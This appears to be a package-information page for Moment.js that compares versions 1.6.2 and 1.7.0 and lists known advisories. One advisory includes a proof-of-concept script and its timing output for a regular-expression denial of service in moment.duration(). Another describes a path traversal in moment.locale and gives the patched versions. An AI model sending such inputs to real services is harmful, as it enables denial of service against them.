Moment.js saw a significant update between versions 1.6.2 and 1.7.0, offering developers an enhanced experience for date manipulation in JavaScript. Version 1.7.0, released in July 2012, built upon the foundation laid by its predecessor, 1.6.2, launched in May 2012. Both versions, authored by Tim Wood, aimed to simplify date handling without extending the native Date prototype.
One notable change is in the package's description itself. Version 1.6.2 highlighted Moment.js as a library that "helps create, manipulate, and format dates," while 1.7.0 succinctly described it as a tool to "Parse, manipulate, and display dates." This subtle shift might indicate a greater emphasis on parsing capabilities in the newer release.
While both versions share common development dependencies like JSHint, Nodeunit and Uglify-js, a key difference lies in the dependencies section. Version 1.6.2 explicitly declares empty dependencies and optional dependencies, highlighting its standalone nature. Version 1.7.0, on the other hand, omits these sections entirely, possibly because there weren't any or they were moved to a different kind of dependecy. Developers upgrading should be aware to check for possible impacts of removed dependencies.
The core functionality, accessible via the GitHub repository, remained consistent. With both versions having the same author and repository URL. Both are accessible via npm as tarballs. For developers already using Moment.js, upgrading to version 1.7.0 might involve testing to ensure compatibility with any new parsing or display features introduced.
All the vulnerabilities related to the version 1.7.0 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().
var moment = require('moment');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
for (i=20000;i<=10000000;i=i+10000) {
console.log("COUNT: " + i);
var str = '-' + genstr(i, '1')
console.log("LENGTH: " + str.length);
var start = process.hrtime();
moment.duration(str)
var end = process.hrtime(start);
console.log(end);
}
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.
Update to version 2.19.3 or later.
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability impacts npm (server) users of moment.js, especially if user provided locale string, eg fr is directly used to switch moment locale.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Sanitize user-provided locale name before passing it to moment.js.
Are there any links users can visit to find out more?
If you have any questions or comments about this advisory: